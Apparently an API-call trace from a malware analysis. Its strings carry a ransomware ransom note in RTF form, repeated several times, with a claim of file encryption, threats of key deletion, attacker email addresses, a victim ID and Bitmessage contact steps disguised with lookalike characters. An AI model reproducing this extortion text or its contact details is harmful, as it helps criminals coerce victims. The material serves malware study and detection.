INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.810] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.810] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 